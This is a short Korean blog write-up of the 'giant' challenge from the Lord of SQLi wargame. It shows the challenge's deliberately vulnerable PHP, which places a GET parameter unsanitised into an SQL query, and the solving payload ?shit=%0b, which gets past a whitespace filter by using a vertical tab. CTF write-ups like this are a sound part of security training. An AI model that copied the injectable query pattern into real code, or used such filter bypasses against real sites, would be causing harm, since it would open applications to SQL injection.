<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
query 가 이렇다.from 사이의 $_GET[shit] 에 공백을 넣어주면 해결된다.
공백문자를 시도해보자
%0a, %0b . . .
%0b 가 된다.
?shit=%0b
'WriteUp > LOS_rubiya' 카테고리의 다른 글
| LOS-rubiya : Succubus (0) | 2020.08.03 |
|---|---|
| LOS-rubiya : Assassin (0) | 2020.08.03 |
| LOS_rubiya : Bugbear (0) | 2020.08.03 |
| LOS -rubiya : Golem (0) | 2020.08.03 |
| LOS -rubiya : Mummy (0) | 2020.07.12 |